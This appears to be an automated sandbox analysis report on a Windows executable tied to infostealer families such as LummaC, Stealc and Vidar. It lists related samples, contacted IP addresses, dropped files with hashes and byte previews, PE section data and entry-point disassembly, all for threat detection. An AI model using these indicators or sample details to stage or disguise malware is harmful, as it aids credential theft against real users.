                                                                                                                                                                                                                                                      • 104.21.96.1
                                                                                                                                                                                                                                                      SET_UP.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                      • 23.55.153.106
                                                                                                                                                                                                                                                      • 104.21.22.222
                                                                                                                                                                                                                                                      • 104.21.96.1
                                                                                                                                                                                                                                                      file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                                      • 23.55.153.106
                                                                                                                                                                                                                                                      • 104.21.22.222
                                                                                                                                                                                                                                                      • 104.21.96.1
                                                                                                                                                                                                                                                      Setup.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                                                      • 23.55.153.106
                                                                                                                                                                                                                                                      • 104.21.22.222
                                                                                                                                                                                                                                                      • 104.21.96.1
                                                                                                                                                                                                                                                      file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, PureLog Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                                      • 23.55.153.106
                                                                                                                                                                                                                                                      • 104.21.22.222
                                                                                                                                                                                                                                                      • 104.21.96.1
                                                                                                                                                                                                                                                      file.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, Stealc, Vidar, XmrigBrowse
                                                                                                                                                                                                                                                      • 23.55.153.106
                                                                                                                                                                                                                                                      • 104.21.22.222
                                                                                                                                                                                                                                                      • 104.21.96.1
                                                                                                                                                                                                                                                      file.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, Stealc, Vidar, XmrigBrowse
                                                                                                                                                                                                                                                      • 23.55.153.106
                                                                                                                                                                                                                                                      • 104.21.22.222
                                                                                                                                                                                                                                                      • 104.21.96.1
                                                                                                                                                                                                                                                      37f463bf4616ecd445d4a1937da06e19XIaCqh1vRm.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                      • 172.67.179.207
                                                                                                                                                                                                                                                      PO_0099822111ORDER.jsGet hashmaliciousRemcosBrowse
                                                                                                                                                                                                                                                      • 172.67.179.207
                                                                                                                                                                                                                                                      QQx0tdFC0b.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                      • 172.67.179.207
                                                                                                                                                                                                                                                      7VfKPMdmiX.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                      • 172.67.179.207
                                                                                                                                                                                                                                                      7VfKPMdmiX.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                      • 172.67.179.207
                                                                                                                                                                                                                                                      Setup.msiGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                      • 172.67.179.207
                                                                                                                                                                                                                                                      file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                                      • 172.67.179.207
                                                                                                                                                                                                                                                      file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, PureLog Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                                      • 172.67.179.207
                                                                                                                                                                                                                                                      file.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, Stealc, Vidar, XmrigBrowse
                                                                                                                                                                                                                                                      • 172.67.179.207
                                                                                                                                                                                                                                                      file.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, Stealc, Vidar, XmrigBrowse
                                                                                                                                                                                                                                                      • 172.67.179.207
                                                                                                                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\C455.tmp.exeXIaCqh1vRm.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                        QQx0tdFC0b.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\ScreenUpdateSync[1].exeXIaCqh1vRm.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                            QQx0tdFC0b.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                              File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):65536
                                                                                                                                                                                                                                                              Entropy (8bit):0.9571409124197301
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:96:ZXmrM6OVosth4BP74sfYQXIDcQLc6lcEpcw3lpOUA+HbHg/8BRTf3Oy1E45WAU6t:p5VoXaM0FhTuUhju3RzuiF7Z24IO89
                                                                                                                                                                                                                                                              MD5:73EF102001FD7871FFF876E149D709FC
                                                                                                                                                                                                                                                              SHA1:FCBEAB9B230219882BB1F314AC94BA1E02ACCE2E
                                                                                                                                                                                                                                                              SHA-256:92F5E93493CCA6106BD266C3135C9D8728B08A05F710B6E94B981471C9517786
                                                                                                                                                                                                                                                              SHA-512:3665FC186D228ECCD57994B03877504E8F8D7E5E1F4B66E049818F566F93B2C7DD57BC5DF99F0C7BB56A6A6C2F7EECEAC45CBF8D4B3A955B3678680E80A1BFF6
                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                              Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.8.6.5.5.5.8.3.2.8.7.9.0.9.9.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.8.6.5.5.5.8.3.7.2.5.4.0.3.4.....R.e.p.o.r.t.S.t.a.t.u.s.=.6.5.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.d.e.6.3.3.f.5.5.-.c.2.b.4.-.4.d.6.b.-.a.9.f.6.-.7.2.a.9.4.0.8.2.5.7.0.a.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.f.b.4.1.1.2.3.4.-.e.d.8.9.-.4.e.7.f.-.9.3.4.5.-.1.9.9.3.6.8.d.8.e.2.3.3.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.C.4.5.5...t.m.p...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.c.e.4.-.0.0.0.1.-.0.0.1.4.-.1.c.c.d.-.5.4.d.f.2.9.4.e.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.f.2.1.4.b.b.a.d.b.0.e.6.e.c.b.a.0.f.a.6.9.2.6.8.e.d.c.7.d.c.2.9.0.0.0.0.f.f.f.f.!.0.0.0.0.4.a.2.0.9.5.6.9.0.b.a.8.f.1.3.2.5.d.d.1.0.1.6.7.3.1.8.7.2.8.4.4.7.d.1.2.0.5.8.a.!.C.4.5.5...t.m.p...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.
                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                              File Type:Mini DuMP crash report, 15 streams, Sat Dec 14 13:13:03 2024, 0x1205a4 type
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):45086
                                                                                                                                                                                                                                                              Entropy (8bit):2.540379742070347
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:192:cjN0XZoCHwweOx1BZWyRamgXioRZAoODKj6xScVX23jNFJP4U8o/41:qKoCHwwZTBkyRamsAQoScFWjNP4M/I
                                                                                                                                                                                                                                                              MD5:4DB395753A3C2E05D856B7F0F8593675
                                                                                                                                                                                                                                                              SHA1:6EA62D84D6867F2C27C75D8B6922EC843423DC78
                                                                                                                                                                                                                                                              SHA-256:9470904E6B9F641DA54C8C1075F38A0B3C83D6CBE06F1A6D03D956279A8D29D7
                                                                                                                                                                                                                                                              SHA-512:1D90FB465422E6E563B15F6EF7A122FC955F182D78AC41D4E840285FE6003C4FBF798BE030ED95EFCE517CF88963977243BFF2BD83A9E009D3DEBF58B5143D4A
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                              Preview:MDMP..a..... ......._.]g............4...............H.......<...<.......t....+..........`.......8...........T............?..Np..........x...........d...............................................................................eJ..............GenuineIntel............T...........P.]g.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                              File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):8286
                                                                                                                                                                                                                                                              Entropy (8bit):3.7008468814449897
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:192:R6l7wVeJSJ676YJU6JYHgmf3CslU2pDT89bT8sfBRm:R6lXJE676Y66mgmfjO/TPfG
                                                                                                                                                                                                                                                              MD5:4B8F80AB411E997C46587F5F9020C2E3
                                                                                                                                                                                                                                                              SHA1:EEF103FD935FA3C7EC643DF849A1D80F58D8268A
                                                                                                                                                                                                                                                              SHA-256:2AE97923F0E7192150234BD7B8FEF9EE5BE30AD6876A517EFC3666CE181C3FA8
                                                                                                                                                                                                                                                              SHA-512:8A7BA5BDBEEBBFDF025DC217416A0BBE88D4B9E25A927C15EA33E4F13D12CB82A16980C71968EEC7C8D580E68616E26D7AF0F0B6DA65FF5499C28933BC6DA41C
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                              Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.3.9.6.<./.P.i.
                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):4565
                                                                                                                                                                                                                                                              Entropy (8bit):4.4461477192113845
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:48:cvIwWl8zsOJg77aI9+xWpW8VYrYm8M4JcW9pGeFK+q81IxaCdyFzFDwMdd:uIjfEI74g7VrJc+oy8lyFzFLdd
                                                                                                                                                                                                                                                              MD5:B6F2FF89FEC8BB6C81C10EC1BFD768DE
                                                                                                                                                                                                                                                              SHA1:7380F87DF26F3CF0190D29708AF0281248D9052F
                                                                                                                                                                                                                                                              SHA-256:A1792DB69D1D27FE84900EB8BF2AA05449D650F2298C0E4D2B7F58E911C339F1
                                                                                                                                                                                                                                                              SHA-512:F9D1C1BCE36E445597BCA0E758CAEBA26867BDDD9C5555A5A2CF8A2CD8FBB4F792525109277E23BAA35678DDD9696A2E4963E09361EAC4133F0DA211DF709EDE
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                              Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="630975" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\TN78WX7nJU.exe
                                                                                                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):361984
                                                                                                                                                                                                                                                              Entropy (8bit):6.633746849794654
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:6144:alAD8SHVttaSqqwtsdu2S6Vfit5Ak+zDwHEjYWZuNCUS:alAZfqqwtuu2nivABAkMWm6
                                                                                                                                                                                                                                                              MD5:D88E2431ABAC06BDF0CD03C034B3E5E3
                                                                                                                                                                                                                                                              SHA1:4A2095690BA8F1325DD10167318728447D12058A
                                                                                                                                                                                                                                                              SHA-256:4D37939B6C9B1E9DEB33FE59B95EFAC6D3B454ADF56E9EE88136A543692EA928
                                                                                                                                                                                                                                                              SHA-512:7AA5317DCDF4343F1789E462F4B5D3D23F58E28B97C8C55FC4B3295BF0C26CFB5349B0A3543B05D6AF8FA2BC77F488A5ECE5EAACEAF5211FA98230EA9B7F49A7
                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 42%
                                                                                                                                                                                                                                                              Joe Sandbox View:
                                                                                                                                                                                                                                                              • Filename: XIaCqh1vRm.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                              • Filename: QQx0tdFC0b.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........S...S...S.....f.R...M.t.M...M.e.G...M.s.=...tj..Z...S... ...M.z.R...M.d.R...M.a.R...RichS...........PE..L.....2e......................?.....\.............@...........................C.............................................l)..P.....B.0............................................................................................................text...l........................... ..`.rdata..L".......$..................@..@.data.....=..@...p... ..............@....rsrc...0.....B.....................@..@........................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\TN78WX7nJU.exe
                                                                                                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):361984
                                                                                                                                                                                                                                                              Entropy (8bit):6.633746849794654
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:6144:alAD8SHVttaSqqwtsdu2S6Vfit5Ak+zDwHEjYWZuNCUS:alAZfqqwtuu2nivABAkMWm6
                                                                                                                                                                                                                                                              MD5:D88E2431ABAC06BDF0CD03C034B3E5E3
                                                                                                                                                                                                                                                              SHA1:4A2095690BA8F1325DD10167318728447D12058A
                                                                                                                                                                                                                                                              SHA-256:4D37939B6C9B1E9DEB33FE59B95EFAC6D3B454ADF56E9EE88136A543692EA928
                                                                                                                                                                                                                                                              SHA-512:7AA5317DCDF4343F1789E462F4B5D3D23F58E28B97C8C55FC4B3295BF0C26CFB5349B0A3543B05D6AF8FA2BC77F488A5ECE5EAACEAF5211FA98230EA9B7F49A7
                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 42%
                                                                                                                                                                                                                                                              Joe Sandbox View:
                                                                                                                                                                                                                                                              • Filename: XIaCqh1vRm.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                              • Filename: QQx0tdFC0b.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........S...S...S.....f.R...M.t.M...M.e.G...M.s.=...tj..Z...S... ...M.z.R...M.d.R...M.a.R...RichS...........PE..L.....2e......................?.....\.............@...........................C.............................................l)..P.....B.0............................................................................................................text...l........................... ..`.rdata..L".......$..................@..@.data.....=..@...p... ..............@....rsrc...0.....B.....................@..@........................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                              File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):1835008
                                                                                                                                                                                                                                                              Entropy (8bit):4.465432428035737
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:6144:LIXfpi67eLPU9skLmb0b4+WSPKaJG8nAgejZMMhA2gX4WABl0uNXdwBCswSbi:MXD94+WlLZMM6YFH5+i
                                                                                                                                                                                                                                                              MD5:F52525DA488CB492DD3BEC87C468132A
                                                                                                                                                                                                                                                              SHA1:F070C0806B6C0471F8FD96731877676688AB2360
                                                                                                                                                                                                                                                              SHA-256:BCC53A89D75CD6B97D4395235876CCDCC1D1C0C0B417A7F5EBC68F84E5C9385B
                                                                                                                                                                                                                                                              SHA-512:C06E743BBD864D6935CA474A2EF5DEFA5C0E10F308F9259BF5831E27856D7D729012C1B5F95321905B3C94641D2E471C14E833D61C7299DB37364D644FCAC0D0
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              Preview:regf6...6....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtmR...)N...............................................................................................................................................................................................................................................................................................................................................]..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                              File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                              Entropy (8bit):6.956894638274951
                                                                                                                                                                                                                                                              TrID:
                                                                                                                                                                                                                                                              • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                                                                                              • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                                                                                              • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                                                                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                                                                              File name:TN78WX7nJU.exe
                                                                                                                                                                                                                                                              File size:457'216 bytes
                                                                                                                                                                                                                                                              MD5:e1c246e51c4460e34a3429a6fc397942
                                                                                                                                                                                                                                                              SHA1:48ee7173d3a33be1b81ce82c351b1b35bfcd4aac
                                                                                                                                                                                                                                                              SHA256:5b6c7709634f9b0f38fcac6fb91bf82eefda4096935f0a539623df2ec981f5b5
                                                                                                                                                                                                                                                              SHA512:094e4e72bbdc3e5c3df0a770b4908bced529efb175ca35adc11cfa72123411ebfa7632cdff3b3aff692f3b163f9327de531c0f22fd22f397a4d5935618c77f4c
                                                                                                                                                                                                                                                              SSDEEP:6144:/g/RikrH9UMQivQq298+yut1M/xYvTFN8guPVmXLxreU:/g/0knOqI8+yOsEYSeU
                                                                                                                                                                                                                                                              TLSH:19A4E02036ED9426E3FB89357D7E82A42A7BF863AB35610F1775271F0E702D48522367
                                                                                                                                                                                                                                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......0M..t,x.t,x.t,x..c..u,x.j~..j,x.j~..`,x.j~...,x.S...},x.t,y..,x.j~..u,x.j~..u,x.j~..u,x.Richt,x.................PE..L...p.3e...
                                                                                                                                                                                                                                                              Icon Hash:46c7c30b0f4e0d59
                                                                                                                                                                                                                                                              Entrypoint:0x4017d8
                                                                                                                                                                                                                                                              Entrypoint Section:.text
                                                                                                                                                                                                                                                              Digitally signed:false
                                                                                                                                                                                                                                                              Imagebase:0x400000
                                                                                                                                                                                                                                                              Subsystem:windows gui
                                                                                                                                                                                                                                                              Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                                                                                                              DLL Characteristics:TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                                                              Time Stamp:0x65339470 [Sat Oct 21 09:05:52 2023 UTC]
                                                                                                                                                                                                                                                              TLS Callbacks:
                                                                                                                                                                                                                                                              CLR (.Net) Version:
                                                                                                                                                                                                                                                              OS Version Major:5
                                                                                                                                                                                                                                                              OS Version Minor:0
                                                                                                                                                                                                                                                              File Version Major:5
                                                                                                                                                                                                                                                              File Version Minor:0
                                                                                                                                                                                                                                                              Subsystem Version Major:5
                                                                                                                                                                                                                                                              Subsystem Version Minor:0
                                                                                                                                                                                                                                                              Import Hash:8ca6f10ad43ce90425a500a902abdeba
                                                                                                                                                                                                                                                              Instruction
                                                                                                                                                                                                                                                              call 00007F1BC48D2012h
                                                                                                                                                                                                                                                              jmp 00007F1BC48CF45Dh
                                                                                                                                                                                                                                                              mov edi, edi
                                                                                                                                                                                                                                                              push ebp
                                                                                                                                                                                                                                                              mov ebp, esp
                                                                                                                                                                                                                                                              sub esp, 00000328h
                                                                                                                                                                                                                                                              mov dword ptr [00456C18h], eax
                                                                                                                                                                                                                                                              mov dword ptr [00456C14h], ecx
                                                                                                                                                                                                                                                              mov dword ptr [00456C10h], edx
                                                                                                                                                                                                                                                              mov dword ptr [00456C0Ch], ebx
                                                                                                                                                                                                                                                              mov dword ptr [00456C08h], esi
                                                                                                                                                                                                                                                              mov dword ptr [00456C04h], edi
                                                                                                                                                                                                                                                              mov word ptr [00456C30h], ss
                                                                                                                                                                                                                                                              mov word ptr [00456C24h], cs
                                                                                                                                                                                                                                                              mov word ptr [00456C00h], ds
                                                                                                                                                                                                                                                              mov word ptr [00456BFCh], es
                                                                                                                                                                                                                                                              mov word ptr [00456BF8h], fs
                                                                                                                                                                                                                                                              mov word ptr [00456BF4h], gs
                                                                                                                                                                                                                                                              pushfd
                                                                                                                                                                                                                                                              pop dword ptr [00456C28h]
                                                                                                                                                                                                                                                              mov eax, dword ptr [ebp+00h]
                                                                                                                                                                                                                                                              mov dword ptr [00456C1Ch], eax
                                                                                                                                                                                                                                                              mov eax, dword ptr [ebp+04h]
                                                                                                                                                                                                                                                              mov dword ptr [00456C20h], eax
                                                                                                                                                                                                                                                              lea eax, dword ptr [ebp+08h]
                                                                                                                                                                                                                                                              mov dword ptr [00456C2Ch], eax
                                                                                                                                                                                                                                                              mov eax, dword ptr [ebp-00000320h]
                                                                                                                                                                                                                                                              mov dword ptr [00456B68h], 00010001h
                                                                                                                                                                                                                                                              mov eax, dword ptr [00456C20h]
                                                                                                                                                                                                                                                              mov dword ptr [00456B1Ch], eax
                                                                                                                                                                                                                                                              mov dword ptr [00456B10h], C0000409h
                                                                                                                                                                                                                                                              mov dword ptr [00456B14h], 00000001h
                                                                                                                                                                                                                                                              mov eax, dword ptr [00454004h]
                                                                                                                                                                                                                                                              mov dword ptr [ebp-00000328h], eax
                                                                                                                                                                                                                                                              mov eax, dword ptr [00454008h]
                                                                                                                                                                                                                                                              mov dword ptr [ebp-00000324h], eax
                                                                                                                                                                                                                                                              call dword ptr [000000B4h]
                                                                                                                                                                                                                                                              Programming Language:
                                                                                                                                                                                                                                                              • [C++] VS2008 build 21022
                                                                                                                                                                                                                                                              • [ASM] VS2008 build 21022
                                                                                                                                                                                                                                                              • [ C ] VS2008 build 21022
                                                                                                                                                                                                                                                              • [IMP] VS2005 build 50727
                                                                                                                                                                                                                                                              • [RES] VS2008 build 21022
                                                                                                                                                                                                                                                              • [LNK] VS2008 build 21022
                                                                                                                                                                                                                                                              NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_IMPORT0x529ec0x50.rdata
                                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x42f0000x16020.rsrc
                                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x525280x40.rdata
                                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_IAT0x510000x188.rdata
                                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                                                                                                                                                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                                                                              .text0x10000x4fefc0x50000c980f14521144584317247d742d49e29False0.8434814453125data7.543798990454789IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                              .rdata0x510000x22cc0x2400dd2e9e430f55ce1f7aff50cae510552fFalse0.3570963541666667data5.4047175303331665IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                              .data0x540000x3da5480x70000e78f5652cbd258ad8f8231a17afddf9unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                              .rsrc0x42f0000x160200x162005218286c30f17cb19b4f3dbef925edc3False0.5519840218926554data5.625752720194425IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                              NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                                                                                                              RT_CURSOR0x440b200xea8Device independent bitmap graphic, 48 x 96 x 8, image size 00.31023454157782515
                                                                                                                                                                                                                                                              RT_ICON0x42f8100xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsTurkmenTurkmenistan0.5189232409381663
                                                                                                                                                                                                                                                              RT_ICON0x4306b80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsTurkmenTurkmenistan0.5717509025270758
                                                                                                                                                                                                                                                              RT_ICON0x430f600x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colorsTurkmenTurkmenistan0.6105990783410138
                                                                                                                                                                                                                                                              RT_ICON0x4316280x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsTurkmenTurkmenistan0.6502890173410405
                                                                                                                                                                                                                                                              RT_ICON0x431b900x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216TurkmenTurkmenistan0.42147302904564315
